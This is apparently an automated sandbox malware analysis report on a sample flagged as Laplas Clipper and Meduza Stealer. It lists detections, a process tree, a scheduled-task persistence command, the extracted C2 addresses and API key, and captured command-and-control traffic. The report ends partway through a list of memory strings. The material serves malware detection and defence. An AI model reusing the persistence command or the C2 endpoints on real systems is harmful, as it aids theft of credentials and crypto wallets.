Edit tour

Windows Analysis Report
Mega.nz Spreader.exe

Overview

General Information

Sample name:	Mega.nz Spreader.exe
Analysis ID:	1485496
MD5:	56b45c6edd70b8d85df6399eea6d24d1
SHA1:	15a65e88ec6dc89e35fef0c5e786ac255d6d4a6e
SHA256:	70f06035e9cc9a891f2959b80e3be9bea2ba07b72bce4fac125249c29c0d9d1c
Tags:	exe
Infos:

Detection

Laplas Clipper, Meduza Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Laplas Clipper

Yara detected Meduza Stealer

.NET source code contains potential unpacker

.NET source code contains very large strings

AI detected suspicious sample

Drops large PE files

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Queries time zone information

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Mega.nz Spreader.exe (PID: 5572 cmdline: "C:\Users\user\Desktop\Mega.nz Spreader.exe" MD5: 56B45C6EDD70B8D85DF6399EEA6D24D1)

leaf.exe (PID: 5340 cmdline: "C:\Users\user\AppData\Local\Temp\leaf.exe" MD5: 8C8C3BCF475B5C95673A810B10A2FC52)

leaf.exe (PID: 1292 cmdline: "{path}" MD5: 8C8C3BCF475B5C95673A810B10A2FC52)

leaf.exe (PID: 1784 cmdline: "{path}" MD5: 8C8C3BCF475B5C95673A810B10A2FC52)

cmd.exe (PID: 6980 cmdline: "cmd.exe" /C schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4788 cmdline: schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

api.exe (PID: 5656 cmdline: "C:\Users\user\AppData\Local\Temp\api.exe" MD5: 9022192413DDA223B6E8AFD73A22CFAA)

lib.exe (PID: 6600 cmdline: "C:\Users\user\AppData\Local\Temp\lib.exe" MD5: D1540618704ECACA1A503B496ED7B801)

conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

lib.exe (PID: 5808 cmdline: "C:\Users\user\AppData\Local\Temp\lib.exe" MD5: D1540618704ECACA1A503B496ED7B801)

svcupdater.exe (PID: 5692 cmdline: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe MD5: A0E117D70EEB8A8AEAB628C95E78F524)

svcupdater.exe (PID: 2568 cmdline: "{path}" MD5: A0E117D70EEB8A8AEAB628C95E78F524)

svcupdater.exe (PID: 3184 cmdline: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe MD5: A0E117D70EEB8A8AEAB628C95E78F524)

svcupdater.exe (PID: 5600 cmdline: "{path}" MD5: A0E117D70EEB8A8AEAB628C95E78F524)

svcupdater.exe (PID: 5084 cmdline: "{path}" MD5: A0E117D70EEB8A8AEAB628C95E78F524)

svcupdater.exe (PID: 2468 cmdline: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe MD5: A0E117D70EEB8A8AEAB628C95E78F524)

cleanup

Malware Configuration

Threatname: Laplas Clipper

{"C2 url": "http://45.159.189.105/bot/", "API key": "6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d"}

Threatname: Meduza Stealer

{"C2 url": "77.105.147.1:15666"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000011.00000002.3289763270.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
Process Memory Space: leaf.exe PID: 5340	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: api.exe PID: 5656	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
Process Memory Space: svcupdater.exe PID: 5692	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: svcupdater.exe PID: 2568	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
Process Memory Space: svcupdater.exe PID: 3184	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /C schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, CommandLine: "cmd.exe" /C schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "{path}", ParentImage: C:\Users\user\AppData\Local\Temp\leaf.exe, ParentProcessId: 1784, ParentProcessName: leaf.exe, ProcessCommandLine: "cmd.exe" /C schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, ProcessId: 6980, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, CommandLine: schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "cmd.exe" /C schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6980, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, ProcessId: 4788, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE Laplas Clipper - Regex CnC Request - Source IP: 192.168.2.5 - Destination IP: 45.159.189.105

Timestamp:	2024-07-31T18:30:04.889268+0200
SID:	2039775
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Laplas Clipper - Regex CnC Request - Source IP: 192.168.2.5 - Destination IP: 45.159.189.105

Timestamp:	2024-07-31T18:27:57.316101+0200
SID:	2039775
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP) - Source IP: 192.168.2.5 - Destination IP: 77.105.147.1

Timestamp:	2024-07-31T18:28:05.682770+0200
SID:	2050807
Source Port:	49704
Destination Port:	15666
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Laplas Clipper - Regex CnC Request - Source IP: 192.168.2.5 - Destination IP: 45.159.189.105

Timestamp:	2024-07-31T18:29:20.997850+0200
SID:	2039775
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP) - Source IP: 192.168.2.5 - Destination IP: 77.105.147.1

Timestamp:	2024-07-31T18:28:05.687876+0200
SID:	2050807
Source Port:	49704
Destination Port:	15666
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Laplas Clipper - Regex CnC Request - Source IP: 192.168.2.5 - Destination IP: 45.159.189.105

Timestamp:	2024-07-31T18:29:42.420442+0200
SID:	2039775
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Mega.nz Spreader.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\api.exe

Avira: detection malicious, Label: TR/Meduza.A

Found malware configuration

Source: 3.0.api.exe.d90000.0.unpack	Malware Configuration Extractor: Meduza Stealer {"C2 url": "77.105.147.1:15666"}
Source: svcupdater.exe.2568.17.memstrmin	Malware Configuration Extractor: Laplas Clipper {"C2 url": "http://45.159.189.105/bot/", "API key": "6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\api.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	ReversingLabs: Detection: 79%

Multi AV Scanner detection for submitted file

Source: Mega.nz Spreader.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\api.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Mega.nz Spreader.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\api.exe

Code function: 3_2_00DD8840 WideCharToMultiByte,WideCharToMultiByte,CryptUnprotectData,LocalFree,

3_2_00DD8840

Source: Mega.nz Spreader.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49705 version: TLS 1.2

Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2087957246.00007FF8B9063000.00000002.00000001.01000000.00000012.sdmp, select.pyd.5.dr
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kaikoBF.pdb source: Mega.nz Spreader.exe, 00000000.00000002.2038521099.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, leaf.exe, 00000001.00000000.2029236657.00000000008A2000.00000002.00000001.01000000.00000005.sdmp, leaf.exe.0.dr, svcupdater.exe.9.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: lib.exe, 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmp, _ctypes.pyd.5.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.5.dr
Source:	Binary string: kaikoBF.pdbSHA256 source: Mega.nz Spreader.exe, 00000000.00000002.2038521099.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, leaf.exe, 00000001.00000000.2029236657.00000000008A2000.00000002.00000001.01000000.00000005.sdmp, leaf.exe.0.dr, svcupdater.exe.9.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Cassa.pdb source: leaf.exe, 00000001.00000002.2188032639.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, leaf.exe, 00000001.00000002.2187846427.0000000002B00000.00000004.08000000.00040000.00000000.sdmp, leaf.exe, 00000001.00000002.2188032639.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 0000000E.00000002.2617772935.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 0000000E.00000002.2617772935.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000012.00000002.2877978549.0000000002927000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Cassa.pdbSHA256 source: leaf.exe, 00000001.00000002.2188032639.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, leaf.exe, 00000001.00000002.2187846427.0000000002B00000.00000004.08000000.00040000.00000000.sdmp, leaf.exe, 00000001.00000002.2188032639.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 0000000E.00000002.2617772935.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 0000000E.00000002.2617772935.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000012.00000002.2877978549.0000000002927000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.5.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: lib.exe, 00000005.00000003.2038247890.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: lib.exe, 00000005.00000003.2038247890.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2087738939.00007FF8B8F88000.00000002.00000001.01000000.00000011.sdmp, _socket.pyd.5.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python311.pdb source: lib.exe, 00000007.00000002.2084707630.00007FF8A88BB000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: _ssl.pyd.5.dr

Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E149AF FindClose,FindFirstFileExW,GetLastError,	3_2_00E149AF
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E149CF FindFirstFileExW,	3_2_00E149CF
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E14A34 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	3_2_00E14A34
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E16B69 FindFirstFileExW,	3_2_00E16B69
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759966878 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	5_2_00007FF759966878
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759970A34 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	5_2_00007FF759970A34
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759966878 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	5_2_00007FF759966878
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF7599569E0 FindFirstFileExW,FindClose,	5_2_00007FF7599569E0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759970A34 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_00007FF759970A34
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759966878 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	7_2_00007FF759966878
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF7599569E0 FindFirstFileExW,FindClose,	7_2_00007FF7599569E0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759966878 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	7_2_00007FF759966878

Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		18_2_06D90508
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		18_2_06D904F7

Source: global traffic

TCP traffic: 192.168.2.5:49704 -> 77.105.147.1:15666

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; /Host: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d HTTP/1.1Host: 45.159.189.105Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d HTTP/1.1Host: 45.159.189.105Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d HTTP/1.1Host: 45.159.189.105Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d HTTP/1.1Host: 45.159.189.105Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 45.159.189.105 45.159.189.105

Source: Joe Sandbox View	ASN Name: PLUSTELECOM-ASRU PLUSTELECOM-ASRU
Source: Joe Sandbox View	ASN Name: HOSTING-SOLUTIONSUS HOSTING-SOLUTIONSUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.147.1

Source: C:\Users\user\AppData\Local\Temp\api.exe

Code function: 3_2_00DDFC60 recv,closesocket,WSACleanup,InternetOpenA,InternetOpenUrlA,HttpQueryInfoW,HttpQueryInfoW,InternetQueryDataAvailable,InternetReadFile,InternetQueryDataAvailable,InternetCloseHandle,Concurrency::cancel_current_task,

3_2_00DDFC60

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; /Host: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d HTTP/1.1Host: 45.159.189.105Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d HTTP/1.1Host: 45.159.189.105Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d HTTP/1.1Host: 45.159.189.105Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d HTTP/1.1Host: 45.159.189.105Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: api.ipify.org

Source: svcupdater.exe, 00000011.00000002.3289763270.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000011.00000002.3289763270.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000011.00000002.3289763270.0000000002E68000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000011.00000002.3289763270.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.159.189.105
Source: svcupdater.exe, 00000011.00000002.3289763270.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000011.00000002.3289763270.0000000002E85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.159.189.105/bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.coj
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.cok
Source: lib.exe, 00000005.00000003.2039007675.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2048755908.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2051694298.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2049182076.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FC8000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FC8000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2050288208.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2038655650.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2041762314.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000005.00000003.2042615497.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 